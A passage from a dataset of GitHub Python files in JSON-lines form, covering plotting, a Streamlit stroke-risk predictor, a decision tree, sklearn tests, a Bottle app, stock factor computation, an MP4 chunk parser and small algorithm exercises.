plot_df.index]]\n df.index = [i.split(\"_\")[1] for i in df.index]\n g = sns.heatmap(\n df,\n cmap=\"Blues\",\n annot=True,\n cbar=False,\n fmt=\".1f\",\n linewidths=0.5,\n ax=axs[i],\n vmin=0,\n annot_kws={\"fontsize\": 5},\n )\n axs[i].set_ylabel(f\"{n} cell lines\")\n#\ndf = plot_df[[i.split(\"_\")[0] not in [\"Haem\", \"Other\"] for i in plot_df.index]]\nsns.heatmap(\n df,\n cmap=\"RdYlGn\",\n center=0,\n annot=True,\n cbar=False,\n fmt=\".2f\",\n linewidths=0.5,\n annot_kws={\"fontsize\": 5},\n ax=axs[2],\n)\n\nplt.subplots_adjust(hspace=0.025)\n\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap_merged.pdf\", 
bbox_inches=\"tight\")\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap_merged.png\", bbox_inches=\"tight\", dpi=600)\nplt.close(\"all\")\n\n\n# ####\nfor x_var, y_var in [(\"MeanProtein\", \"replicates_correlation\"), (\"StdProtein\", \"F2\"), (\"MeanProtein\", \"F2\")]:\n GIPlot.gi_regression(ss_merged[x_var], ss_merged[y_var])\n\n plt.savefig(f\"{RPATH}/SampleAttenuation_regression_{x_var}_{y_var}.pdf\", bbox_inches=\"tight\")\n plt.savefig(f\"{RPATH}/SampleAttenuation_regression_{x_var}_{y_var}.png\", bbox_inches=\"tight\", dpi=600)\n plt.close(\"all\")\n","repo_name":"EmanuelGoncalves/cancer_proteomics","sub_path":"multiomics_integration/notebooks/SampleAttenuation.py","file_name":"SampleAttenuation.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"38744719685","text":"import pandas as pd \r\nimport warnings\r\nimport streamlit as st\r\nimport joblib\r\nfrom sklearn.preprocessing import FunctionTransformer\r\nimport sklearn\r\nwarnings.filterwarnings('ignore')\r\n\r\n#----------------------------------------------------------------------------------------------------------------\r\n\r\ndef bmi_glu_preprocessing(x):\r\n bmi_bins , bmi_labels , bmi_mapper = joblib.load('bmi_bins.h5') , joblib.load('bmi_labels.h5') , joblib.load('bmi_mapper.h5')\r\n glucose_bins , glucose_labels = joblib.load('glucose_bins.h5') , joblib.load('glucose_labels.h5')\r\n glucose_mapper = joblib.load('glucose_mapper.h5')\r\n x['glucose_cat'] = pd.cut(x['avg_glucose_level'], bins = glucose_bins, labels = glucose_labels)\r\n x['bmi_cat'] = pd.cut(x['bmi'], bins = bmi_bins, labels = bmi_labels)\r\n x['glucose_cat'] = x['glucose_cat'].map(glucose_mapper).astype(int)\r\n x['bmi_cat'] = x['bmi_cat'].map(bmi_mapper).astype(int)\r\n x.drop(['bmi' , 'avg_glucose_level'] , axis = 1 , inplace = True )\r\n return x\r\n\r\n#----------------------------------------------------------------------------------------------------------------\r\n\r\nSVC = joblib.load('SVC.h5')\r\nSVC.steps.insert(0 , ('preprocessing' , FunctionTransformer(bmi_glu_preprocessing)))\r\n\r\n#----------------------------------------------------------------------------------------------------------------\r\n\r\ndef Predict(gender, age, hypertension, heart_disease, ever_married, work_type,Residence_type,avg_glucose_level,bmi,smoking_status):\r\n test = pd.DataFrame(columns=['gender', 'age', 'hypertension', 'heart_disease', 'ever_married',\r\n 'work_type', 'Residence_type', 'avg_glucose_level', 'bmi',\r\n 'smoking_status'])\r\n \r\n test.at[0,['gender']] = gender\r\n test.at[0,['age']] = age\r\n test.at[0,['hypertension']] = hypertension\r\n test.at[0,['heart_disease']] = heart_disease\r\n test.at[0,['ever_married']] = ever_married\r\n test.at[0,['work_type']] = work_type\r\n test.at[0,['Residence_type']] = Residence_type\r\n test.at[0,['avg_glucose_level']] = avg_glucose_level\r\n test.at[0,['bmi']] = bmi\r\n test.at[0,['smoking_status']] = smoking_status\r\n \r\n return SVC.predict(test)[0]\r\n \r\n#----------------------------------------------------------------------------------------------------------------\r\n \r\n \r\ndef main():\r\n st.header('estimate your stroke'.capitalize())\r\n st.image('images.jfif')\r\n gender = st.selectbox('what is your gender'.title() , ['Male', 'Female',])\r\n age = st.slider('what is your age'.title() , min_value = 1 , max_value=85 , value=20 , step=1)\r\n hypertension = st.selectbox('have you 
hypertension'.title() , ['NO', 'YES'])\r\n heart_disease = st.selectbox('have you heart disease'.title() , ['YES', 'NO'])\r\n ever_married = st.selectbox('have you ever married'.title() , ['Yes', 'No'])\r\n work_type = st.selectbox('what is your work type'.title() , ['Private', 'Self-employed', 'Govt_job', 'Never_worked'])\r\n Residence_type = st.selectbox('what is your Residence type'.title() , ['Urban', 'Rural'])\r\n avg_glucose_level = st.slider('enter youe glucose ratio'.title() ,min_value = 50.0 , max_value=280.0 , value=70.0 , step=0.1)\r\n bmi = st.slider('enter your bmi'.title() ,min_value = 10.0 , max_value=100.0 , value=70.0 , step=0.2 )\r\n smoking_status = st.selectbox('have you smoke'.title() , ['formerly smoked', 'never smoked', 'smokes', 'Unknown'])\r\n \r\n if st.button('predict'.title()):\r\n ans = Predict(gender, age, hypertension, heart_disease, ever_married,\r\n work_type,Residence_type,avg_glucose_level,bmi,smoking_status)\r\n if ans:\r\n st.write('Unfortunately, you are prone to a stroke, you should consult a doctor'.title() , ans)\r\n else :\r\n st.write('No need to worry, you are in good health'.title() , ans)\r\nmain()\r\n","repo_name":"tareekziad/Health-Care-Stroke-Classification-Project","sub_path":"StrokeClassifier.py","file_name":"StrokeClassifier.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4894270783","text":"import math\narr1 = [1, 35]\narr2 = [6, 9, 13, 15, 20, 25, 29, 46]\nn = len(arr1)\nm = len(arr2)\ndef merge(arr1,arr2,n,m):\n ceil = math.ceil((n+m)/2)\n temp = -1\n while True:\n print(ceil, arr1, arr2)\n if ceil == temp:\n break\n else:\n temp = ceil\n \n for i in range(ceil, m + n ):\n first = i - ceil \n second = i\n print(first, second)\n if first<n and second<n:\n if arr1[first]>arr1[second]:\n arr1[first],arr1[second] = arr1[second], arr1[first]\n elif second >= n and first<n:\n second -= n\n if arr1[first]>arr2[second]:\n arr1[first],arr2[second] = arr2[second], arr1[first]\n else:\n first -= n\n second -= n\n if arr2[first]>arr2[second]:\n arr2[first],arr2[second] = arr2[second], arr2[first]\n #updated ceil\n ceil = math.ceil(ceil/2)\nmerge(arr1, arr2, n, m)\nprint(arr1, arr2)","repo_name":"Bidipto/Fab-Feb","sub_path":"micc/5_mergertwosortedarray.py","file_name":"5_mergertwosortedarray.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23495943587","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nclass DecisionTreeClassifier(object):\n def __init__(self, max_depth):\n self.depth = 0\n self.max_depth = max_depth\n \n def fit(self, x, y, par_node={}, depth=0):\n if par_node is None: \n return None\n elif len(y) == 0:\n return None\n elif self.all_same(y):\n return {'val':y[0]}\n elif depth >= self.max_depth:\n return None\n else: \n col, cutoff, entropy = self.find_best_split_of_all(x, y) # find one split given an information gain \n y_left = y[x[:, col] < cutoff]\n y_right = y[x[:, col] >= cutoff]\n par_node = {'col': iris.feature_names[col], 'index_col':col,\n 'cutoff':cutoff,\n 'val': np.round(np.mean(y))}\n par_node['left'] = self.fit(x[x[:, col] < cutoff], y_left, {}, depth+1)\n par_node['right'] = self.fit(x[x[:, col] >= cutoff], y_right, {}, depth+1)\n self.depth += 1 \n self.trees = par_node\n return par_node\n \n def find_best_split_of_all(self, x, y):\n col = None\n min_entropy = 1\n cutoff = None\n for i, c in 
enumerate(x.T):\n entropy, cur_cutoff = self.find_best_split(c, y)\n if entropy == 0: # find the first perfect cutoff. Stop Iterating\n return i, cur_cutoff, entropy\n elif entropy <= min_entropy:\n min_entropy = entropy\n col = i\n cutoff = cur_cutoff\n return col, cutoff, min_entropy\n \n def find_best_split(self, col, y):\n min_entropy = 10\n n = len(y)\n for value in set(col):\n y_predict = col < value\n my_entropy = get_entropy(y_predict, y)\n if my_entropy <= min_entropy:\n min_entropy = my_entropy\n cutoff = value\n return min_entropy, cutoff\n \n def all_same(self, items):\n return all(x == items[0] for x in items)\n \n def predict(self, x):\n tree = self.trees\n results = np.array([0]*len(x))\n for i, c in enumerate(x):\n results[i] = self._get_prediction(c)\n return results\n \n def _get_prediction(self, row):\n cur_layer = self.trees\n while cur_layer.get('cutoff'):\n if row[cur_layer['index_col']] < cur_layer['cutoff']:\n cur_layer = cur_layer['left']\n else:\n cur_layer = cur_layer['right']\n else:\n return cur_layer.get('val')\n\n","repo_name":"Abhinav-Shandilya/ML101","sub_path":"DecisionTrees.py","file_name":"DecisionTrees.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24076031260","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef migrate_users(apps, *args, **kwargs):\n Collection = apps.get_model('video', 'Collection')\n User = apps.get_model('auth', 'User')\n\n user = User.objects.first()\n\n for col in Collection.objects.filter(user=1):\n col.user_id = user.pk\n col.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('video', '0002_auto_20151023_1210'),\n ]\n\n operations = [\n migrations.RunPython(migrate_users, lambda *args, **kwargs: True),\n ]\n","repo_name":"zerc/uvideo","sub_path":"video/migrations/0003_auto_20151023_1225.py","file_name":"0003_auto_20151023_1225.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33508010542","text":"import sys\nimport threading\n\n\nsys.path.insert(0, '../../src')\n\nfrom entities.vision.helpers.json_handler import JsonHandler\nfrom entities.vision.helpers.vision_helper import Color\nfrom entities.audio.audio import Audio\n\nfrom entities.threading.utils import SharedObject\nfrom entities.vision.vision import Vision\n\naudio = Audio()\n\ncolor_ranges = [Color(\"blue\", [84, 44, 52], [153, 255, 255]),\n Color(\"yellow\", [21, 110, 89], [30, 255, 255]),\n Color(\"orange\", [0, 108, 104], [6, 255, 255]),\n Color(\"green\", [28, 39, 0], [94, 255, 255]),\n Color(\"red\", [167, 116, 89], [180, 255, 255])]\njson_handler = JsonHandler(color_ranges,\n \"color_ranges.txt\",\n \"buildings.txt\")\ncolor_range = json_handler.get_color_range()\nsaved_buildings = json_handler.get_save_buildings()\nfor building in saved_buildings:\n print(str(building.number))\n\nfor gange in color_range:\n print(gange.lower)\n\nvision = Vision(SharedObject())\n\ntry:\n if len(sys.argv) > 1:\n if sys.argv[1] == \"hsv\" and sys.argv[2] == \"picker\":\n threading.Thread(target=vision.helpers.hsv_picker.run, args=(color_range, json_handler)).start()\n elif sys.argv[1] == \"saving\":\n threading.Thread(target=vision.saving.run, args=(color_range, json_handler)).start()\n elif sys.argv[1] == \"recognize\":\n threading.Thread(target=vision.recognize.run, 
args=(color_range, audio, saved_buildings)).start()\n else:\n print(\"[ERROR] Wrong argument given..\")\n\n # Default no argument\n else:\n threading.Thread(target=vision.recognize.run, args=(color_range, audio, saved_buildings)).start()\nexcept AttributeError:\n print(\"[ERROR] Something went wrong..\")\n\n","repo_name":"SvenMark/IDP","sub_path":"src/tests/vision_test.py","file_name":"vision_test.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5873729","text":"import numpy as np\nimport scipy.sparse as sp\n\nfrom sklearn.utils.testing import assert_almost_equal\nfrom sklearn.utils.testing import assert_raises\nfrom sklearn.utils.testing import assert_raises_regex\n\nfrom sklearn import datasets\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.linear_model import Lasso\nfrom sklearn.multioutput import MultiOutputRegressor\n\n\ndef test_multi_target_regression():\n X, y = datasets.make_regression(n_targets=3)\n X_train, y_train = X[:50], y[:50]\n X_test, y_test = X[50:], y[50:]\n\n references = np.zeros_like(y_test)\n for n in range(3):\n rgr = GradientBoostingRegressor(random_state=0)\n rgr.fit(X_train, y_train[:, n])\n references[:,n] = rgr.predict(X_test)\n\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr.fit(X_train, y_train)\n y_pred = rgr.predict(X_test)\n\n assert_almost_equal(references, y_pred)\n\n\ndef test_multi_target_regression_one_target():\n # Test multi target regression raises\n X, y = datasets.make_regression(n_targets=1)\n X_train, y_train = X[:50], y[:50]\n X_test, y_test = X[50:], y[50:]\n\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n assert_raises(ValueError, rgr.fit, X_train, y_train)\n\n\ndef test_multi_target_sparse_regression():\n X, y = datasets.make_regression(n_targets=3)\n X_train, y_train = X[:50], y[:50]\n X_test, y_test = X[50:], y[50:]\n\n for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,\n sp.lil_matrix]:\n rgr = MultiOutputRegressor(Lasso(random_state=0))\n rgr_sparse = MultiOutputRegressor(Lasso(random_state=0))\n\n rgr.fit(X_train, y_train)\n rgr_sparse.fit(sparse(X_train), y_train)\n\n assert_almost_equal(rgr.predict(X_test), rgr_sparse.predict(sparse(X_test)))\n\n\ndef test_multi_target_sample_weights_api():\n X = [[1,2,3], [4,5,6]]\n y = [[3.141, 2.718], [2.718, 3.141]]\n w = [0.8, 0.6]\n\n rgr = MultiOutputRegressor(Lasso())\n assert_raises_regex(ValueError, \"does not support sample weights\",\n rgr.fit, X, y, w)\n\n # no exception should be raised if the base estimator supports weights\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr.fit(X, y, w)\n\n\ndef test_multi_target_sample_weights():\n # weighted regressor\n Xw = [[1,2,3], [4,5,6]]\n yw = [[3.141, 2.718], [2.718, 3.141]]\n w = [2., 1.]\n rgr_w = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr_w.fit(Xw, yw, w)\n\n # unweighted, but with repeated samples\n X = [[1,2,3], [1,2,3], [4,5,6]]\n y = [[3.141, 2.718], [3.141, 2.718], [2.718, 3.141]]\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr.fit(X, y)\n\n X_test = [[1.5,2.5,3.5], [3.5,4.5,5.5]]\n assert_almost_equal(rgr.predict(X_test), 
rgr_w.predict(X_test))\n","repo_name":"angadgill/Parallel-SGD","sub_path":"scikit-learn/sklearn/tests/test_multioutput.py","file_name":"test_multioutput.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"}
{"seq_id":"11149136855","text":"import os\nfrom bottle import Bottle, default_app, run, hook, response\n\napp = Bottle()\n\nwith app:\n    assert app is default_app()\n\n    @hook('after_request')\n    def enable_cors():\n        response.headers['Access-Control-Allow-Origin'] = '*'\n        response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'\n        response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n    # Capture routes defined in other modules\n    import index\n\n    # After first push to heroku, set environment variable with:\n    # heroku config:set APP_LOCATION=heroku\n    if os.environ.get('APP_LOCATION') == 'heroku':\n        run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\n    else:\n        run(host='localhost', port=int(os.environ.get('PORT', 8000)), debug=True)","repo_name":"lucianaa/miniapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"35860649695","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n    Author: Wusf --<wushifan221@gmail.com>\n    Purpose: \n    Created: 2016/1/25\n\"\"\"\n\nimport os,numpy\nimport sqlite3 as lite\nfrom ConfigParser import ConfigParser\n\nimport Tools.GetLocalDatabasePath as GetPath\nimport Tools.GetTradeDays as GetTrdDay\nimport UpdateFactorDatabase.FundamentalFactors._CalculateFactorValues as CalcFactorVals\nimport InvestmentUniverse.GetIndexConstituentStocks as GetIndexConstituentStocks\nimport Tools.LogOutputHandler as LogHandler\nimport Configs.RootPath as Root\nRootPath = Root.RootPath \n\n\n########################################################################\nclass ComputeFactorValues(object):\n    \"\"\"\n    Compute fundamental factor values for every stock\n    in the given investment universe\n    \"\"\"\n    \n    #----------------------------------------------------------------------\n    def __init__(self,logger=None):\n        \"\"\"Constructor\"\"\"\n        #Create log file\n        if logger == None:\n            self.logger = LogHandler.LogOutputHandler(\"ComputeFactorsAndZScores\")\n        else: \n            self.logger = logger\n        \n        dbPathProcessedData = GetPath.GetLocalDatabasePath()[\"EquityDataRefined\"]\n        self.dbPathProcessedData = dbPathProcessedData\n        self.totalTradeDay = GetTrdDay.GetTradeDays() \n        \n\n    #----------------------------------------------------------------------\n    def LoadSourceData(self,dbPathFdmtData,dbPathMktData,dbPathConstituentStocks):\n        \"\"\"\n        Load source data from the local databases\n        \"\"\"\n        self.objConstituentStocks = GetIndexConstituentStocks.GetIndexConstituentStocks(dbPathConstituentStocks,self.logger) \n        self.objCalcFactorVals = CalcFactorVals.CalculateFactorValues(dbPathFdmtData,dbPathMktData,None,self.logger)\n        \n        \n    #----------------------------------------------------------------------\n    def LoadFactorAlgos(self,factorStyle):\n        \"\"\"\n        Load algorithms for computing factor values\n        \"\"\"\n        self.factorNames = []\n        self.factorAlgos = []\n        for style in factorStyle:\n            path = RootPath+\"\\\\UpdateFactorDatabase\\\\FundamentalFactors\\\\FactorAlgos\\\\\"+style\n            algoFiles = os.listdir(path)\n            for algoFile in algoFiles: \n                algoName = algoFile.split('.')\n                if algoName[0][0]!='_' and algoName[1]==\"py\":\n                    self.logger.info(\"<{}>-Load factor algo {} 
{}\".format(__name__.split('.')[-1],style,algoName[0]))\n self.factorNames.append(algoName[0])\n exec(\"import UpdateFactorDatabase.FundamentalFactors.FactorAlgos.{}.{} as algo\".format(style,algoName[0]))\n self.factorAlgos.append(algo)\n \n \n #----------------------------------------------------------------------\n def ComputeAndSaveFactorValues(self,factorDatabaseName,begDate):\n \"\"\"\n Start to run factor computation\n \"\"\"\n self.conn = lite.connect(self.dbPathProcessedData+factorDatabaseName+\".db\")\n self.conn.text_factory = str\n self.cur = self.conn.cursor()\n self.cur.execute(\"PRAGMA synchronous = OFF\")\n self.cur.execute(\"DROP TABLE IF EXISTS FundamentalFactors\")\n sqlStr = \"\"\n for item in self.factorNames:\n sqlStr+=','+item+\" FLOAT\"\n self.cur.execute(\"\"\"\n CREATE TABLE FundamentalFactors(StkCode TEXT,\n StkName TEXT,\n IndusCode TEXT,\n IndusName TEXT,\n Date TEXT,\n AcctPeriod TEXT,\n ReportType TEXT\n {})\n \"\"\".format(sqlStr)) \n \n insertSql = \"?,?,?,?,?,?,?\"+len(self.factorAlgos)*\",?\"\n \n allStkCodes = self.objCalcFactorVals.GetAllStockCodes()\n \n for stk in allStkCodes:\n self.logger.info(\"<{}>-Compute factor of {}\".format(__name__.split('.')[-1],stk))\n declareDate = self.objCalcFactorVals.GetFundamentalDataDeclareDate(stk,begDate)\n\n for dt in declareDate: \n vals = self.objCalcFactorVals.Calculate(dt,180,stk,self.factorAlgos)\n stkInfo = self.objConstituentStocks.GetStockNameAndIndustry(stk,dt)\n if vals!=None and vals[-1]!=None:\n if stkInfo!=None:\n row = [stk,stkInfo[0],stkInfo[1],stkInfo[2],dt,vals[0],vals[1]]\n else:\n row = [stk,None,None,None,dt,vals[0],vals[1]]\n for val in vals[2]:\n row.append(val)\n self.cur.execute(\"INSERT INTO FundamentalFactors VALUES ({})\".format(insertSql),tuple(row))\n self.conn.commit()\n self.cur.execute(\"CREATE INDEX Idf ON FundamentalFactors(Date,StkCode)\")\n self.conn.commit()\n \n \n #----------------------------------------------------------------------\n def ComputeAndSaveZScores(self,configPath,classification):\n \"\"\"\n 因子值标准化\n \"\"\"\n conf = ConfigParser()\n conf.read(configPath)\n self.logger.info(\"<{}>-Load industry configs\".format(__name__.split('.')[-1]))\n indusList = conf.items(classification)\n conn = lite.connect(self.dbPathProcessedData+self.factorDatabaseName+\".db\")\n conn.text_factory = str\n cur = conn.cursor()\n \n cur.execute(\"PRAGMA table_info(FactorValues)\")\n cols = cur.fetchall()\n sqlStr=cols[0][1]+' '+cols[0][2]\n for t in cols[1:]:\n sqlStr+=','+t[1]+\" \"+t[2]\n cur.execute(\"DROP TABLE IF EXISTS ZScores\")\n cur.execute(\"CREATE TABLE ZScores({})\".format(sqlStr)) \n insertSql = \"?\"+\",?\"*(len(cols)-1)\n \n cur.execute(\"SELECT DISTINCT Date FROM FactorValues ORDER BY Date\")\n dates = cur.fetchall()\n for dt in dates:\n date = dt[0]\n i=0\n for indus in indusList:\n self.logger.info(\"<{}>-Process industy {}, {}\".format(__name__.split('.')[-1],indus[0],dt))\n cur.execute(\"SELECT * FROM FactorValues WHERE Date='{}' AND IndusCode in ({})\".format(date,indus[0]))\n #print \"SELECT StkCode FROM FactorValues WHERE Date='{}' AND IndusCode in ({})\".format(date,indus[0])\n rows = cur.fetchall()\n if len(rows)>0:\n i+=1\n _mat = []\n stkInfo = []\n for row in rows:\n stkInfo.append(row[0:8])\n _mat.append(row[8:])\n mat = numpy.array(_mat,dtype=numpy.float)\n\n w_mat = self.Winsorize(mat, 3) \n for k in xrange(len(stkInfo)):\n r = list(stkInfo[k])+w_mat[k,:].tolist()\n cur.execute(\"INSERT INTO ZScores VALUES ({})\".format(insertSql),tuple(r))\n #print 
i,indus,dt \n conn.commit()\n cur.execute(\"CREATE INDEX Id2 ON ZScores(Date,StkCode)\")\n conn.commit() \n\n\n","repo_name":"wusf/MyQunatLib","sub_path":"UpdateFactorDatabase/FundamentalFactors/ComputeFactorValues.py","file_name":"ComputeFactorValues.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74757740322","text":"#!/usr/bin/env python\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os.path\nimport struct\nimport sys\n\n\ndef parse_box(f):\n buf = f.read(8)\n box_size = struct.unpack('>I', buf[:4])[0]\n box_type = str(buf[4:], 'utf-8')\n\n if box_size == 1:\n buf = f.read(8)\n box_size = struct.unpack('>Q', buf)[0]\n\n return box_size, box_type\n\n\ndef main(filename_in):\n containers = ('moov', 'trak', 'edts', 'mdia', 'minf', 'dinf', 'stbl')\n\n with open(filename_in, 'rb') as f_in:\n f_in.seek(0, 2)\n file_size = f_in.tell()\n\n cur = 0\n sc_table = []\n sz_table = []\n co_table = []\n while True:\n f_in.seek(cur)\n\n box_size, box_type = parse_box(f_in)\n if box_size == 0:\n box_size = file_size - cur\n\n if box_type in containers:\n box_size, box_type = parse_box(f_in)\n if box_size == 0:\n box_size = file_size - cur\n cur += 8\n elif box_type == 'stsc':\n # Sample-to-Chunk Atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n n_entries = struct.unpack('>I', buf[4:8])[0]\n\n for i in range(n_entries):\n i0 = 8 + i*12\n i1 = i0 + 12\n if len(buf) < i1: break\n first_chunk = struct.unpack('>I', buf[i0:i0+4])[0]\n samples_per_chunk = struct.unpack('>I', buf[i0+4:i0+8])[0]\n sample_desc_id = struct.unpack('>I', buf[i0+8:i0+12])[0]\n sc_table.append((first_chunk, samples_per_chunk, sample_desc_id))\n # print(f'{i:6d}: {(first_chunk, samples_per_chunk, sample_desc_id)}')\n elif box_type == 'stsz':\n #Sample Size Atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n sample_size = struct.unpack('>I', buf[4:8])[0]\n n_entries = struct.unpack('>I', buf[8:12])[0]\n\n for i in range(n_entries):\n i0 = 12 + i*4\n i1 = i0 + 4\n if len(buf) < i1: break\n size = struct.unpack('>I', buf[i0:i1])[0]\n sz_table.append(size)\n # print(f'{i:6d}: {size}')\n elif box_type == 'stco':\n #Chunk Offset Atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n n_entries = struct.unpack('>I', buf[4:8])[0]\n\n for i in range(n_entries):\n i0 = 8 + i*4\n i1 = i0 + 4\n if len(buf) < i1: break\n offset = struct.unpack('>I', buf[i0:i1])[0]\n co_table.append(offset)\n # print(f'{i:6d}: {offset}')\n elif box_type == 'co64':\n #64-bit chunk offset atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n n_entries = struct.unpack('>I', buf[4:8])[0]\n\n for i in range(n_entries):\n i0 = 8 + i*8\n i1 = i0 + 8\n if len(buf) < i1: break\n offset = struct.unpack('>Q', buf[i0:i1])[0]\n co_table.append(offset)\n # print(f'{i:6d}: {offset}')\n\n if len(sc_table) != 0 and len(sz_table) != 0 and len(co_table) != 0:\n print('######################## ########################')\n i = 0\n l = 0\n while True:\n m0, n, _ = sc_table[i]\n if i + 1 < len(sc_table):\n m1 = sc_table[i + 1][0]\n else:\n m1 = len(co_table) + 1\n\n j = m0 - 1\n while True:\n offset = co_table[j]\n\n k = 0\n while True:\n cur_temp = f_in.tell()\n f_in.seek(offset)\n buf = bytes([0x00, 0x00]) + f_in.read(6)\n f_in.seek(cur_temp)\n binary = struct.unpack('>Q', buf)[0]\n mark = ' '\n if sz_table[l] < 100: mark = 'v'\n 
print(f'{mark}{offset:10d} {sz_table[l]:6d} {binary:059_b}')\n offset += sz_table[l]\n l += 1\n\n k += 1\n if k >= n:\n break\n\n j += 1\n if j >= m1 - 1:\n break\n\n i += 1\n if i >= len(sc_table):\n break\n print('')\n\n sc_table = []\n sz_table = []\n co_table = []\n\n cur += box_size\n if cur >= file_size:\n break\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(f'Usage: python {sys.argv[0]} in.mp4')\n sys.exit(1)\n\n filename_in = sys.argv[1]\n\n main(filename_in)\n","repo_name":"tknr/repair-corrupt-mp4","sub_path":"chunk.py","file_name":"chunk.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30064178458","text":"from kivymd.app import MDApp\nfrom kivy.uix.screenmanager import Screen\nfrom kivymd.uix.button import MDIconButton\n# self.theme_cls.primary_palette = \"Purple\" no work on icon button\nclass MyApp(MDApp):\n def build(self):\n screen = Screen()\n screen.add_widget(\n MDIconButton(\n icon= \"android\", #use can use png path here\n pos_hint={\"center_x\":0.5,\"center_y\":0.5},\n user_font_size= \"128sp\", #by default 48sp\n )\n )\n return screen\nMyApp().run()","repo_name":"WithSJ/Learn-KivyMD","sub_path":"Widget testing/KivyMD Buttons/kivyMD IconButton.py","file_name":"kivyMD IconButton.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74332831841","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\ndef three_sum(array):\n \"\"\"\n Given an array `array` of n integers, find one triplet\n in the array which gives the sum of zero.\n\n `array` must be in increasing order\n \"\"\"\n n = len(array)\n for i in range(n - 2):\n j = i + 1\n k = n - 1\n\n while k >= j:\n if array[i] + array[j] + array[k] == 0:\n return array[i], array[j], array[k]\n elif array[i] + array[j] + array[k] > 0:\n k = k - 1\n else:\n j = j + 1\n","repo_name":"Firkraag/algorithm","sub_path":"three_sum.py","file_name":"three_sum.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"13229676948","text":"#!/usr/bin/env python3\n\nfrom Crypto.Hash import SHA256\nimport os\nimport sys\n\ndef fileHash(filename:str)->bytes:\n \"\"\"Return hash value of a file\"\"\"\n file=open(filename,'rb')\n f_size=os.path.getsize(filename)\n if f_size/1024==0:\n seek_pos=f_size-1024\n else:\n seek_pos=f_size-f_size%1024\n block=None\n blocks=[]\n hash_val=bytes()\n while seek_pos>=0:\n file.seek(seek_pos)\n block=file.read(1024)+hash_val\n blocks.append(block)\n hash_val=SHA256.new(block).digest()\n seek_pos-=1024\n blocks.reverse()\n return hash_val,blocks\n\nclass PseudoReceive:\n blocks=[]\n nBlock=0\n hash_val=None\n curent_receive_index=-1\n def __init__(self,filename:str):\n \"\"\"Initialize pseudo receive instance object.\"\"\"\n self.hash_val,self.blocks=fileHash(filename)\n self.nBlock=len(self.blocks)\n self.curent_receive_index=-1\n\n def receiveNextBlock(self):\n self.curent_receive_index+=1\n if self.curent_receive_index>=len(self.blocks):\n print(\"Succesfully receive all blocks\")\n return self.curent_receive_index,None\n print(\"Receive block number \",self.curent_receive_index)\n return self.curent_receive_index,self.blocks[self.curent_receive_index]\n def getHashVal(self):\n return self.hash_val\n\ndef pseudoVerify(pseudoReceive:PseudoReceive)->bool:\n hash_val=pseudoReceive.getHashVal()\n 
